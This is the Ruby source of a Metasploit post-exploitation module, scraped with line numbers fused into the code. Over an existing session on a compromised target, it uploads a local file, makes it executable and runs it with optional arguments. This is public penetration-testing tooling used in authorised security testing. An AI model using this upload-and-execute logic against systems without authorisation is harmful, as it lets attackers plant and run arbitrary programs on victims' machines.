Path: blob/master/modules/post/multi/manage/upload_exec.rb
19850 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Exploit::FileDropper89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Upload and Execute',14'Description' => %q{Push a file and execute it.},15'Author' => 'egypt',16'License' => MSF_LICENSE,17'Platform' => ['win', 'unix', 'linux', 'osx', 'bsd', 'solaris'],18'SessionTypes' => ['meterpreter', 'shell'],19'Notes' => {20'Stability' => [CRASH_SAFE],21'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],22'Reliability' => []23}24)25)2627register_options([28OptPath.new('LPATH', [true, 'Local file path to upload and execute']),29OptString.new('RPATH', [false, 'Remote file path on target (default is basename of LPATH)']),30OptString.new('ARGS', [false, 'Command-line arguments to pass to the uploaded file']),31OptInt.new('TIMEOUT', [true, 'Timeout for command execution', 60])32])33end3435def run36print_status("Uploading #{lpath} to #{rpath}")37upload_file(rpath, lpath)38register_file_for_cleanup(rpath)3940if session.platform == 'windows'41# Don't use cmd.exe /c start so we can fetch output42cmd = rpath43else44# Set 700 so only we can execute the file45chmod(rpath, 0o700)4647# Handle absolute paths48cmd = rpath.start_with?('/') ? rpath : "./#{rpath}"49end5051print_status("Executing command: #{cmd}")52output = cmd_exec(cmd, args, timeout)5354if output.blank?55print_status('Command returned no output')56else57print_line(output)58end59end6061def lpath62datastore['LPATH']63end6465def rpath66datastore['RPATH'].blank? ? File.basename(lpath) : datastore['RPATH']67end6869def args70datastore['ARGS']71end7273def timeout74datastore['TIMEOUT']75end76end777879